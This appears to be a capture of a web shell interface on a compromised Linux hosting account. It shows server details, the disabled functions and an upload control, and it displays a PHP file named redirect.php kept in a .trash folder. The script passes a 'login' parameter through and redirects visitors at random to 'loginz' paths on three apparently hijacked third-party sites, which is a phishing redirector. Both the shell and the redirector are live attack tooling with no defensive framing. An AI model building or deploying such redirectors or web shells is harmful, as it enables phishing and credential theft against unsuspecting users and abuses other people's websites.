HEX
Server: Apache
System: Linux panel.gemzo.net 4.18.0-477.10.1.lve.el8.x86_64 #1 SMP Wed May 17 07:12:55 EDT 2023 x86_64
User: birehlibraryps (1007)
PHP: 8.1.28
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/birehlibraryps/.trash/redirect.php
<?php
$m = @$_GET["login"];

$redirectedurl[1]="http://lanzholidays.com/OLD-Site/wp-includes/Text/Diff/Renderer/loginz/".$m;
$redirectedurl[2]="http://www.xn--f1agcgmqm.xn--j1adfnc.xn--p1acf/wp-content/themes/theme2/vc_templates/loginz/".$m;
$redirectedurl[3]="http://www.meshink.xyz/updatedgst/resources/lang/tu/loginz/".$m;

$randomurl = rand(1, 3);
header("location: ".$redirectedurl[$randomurl]);
?>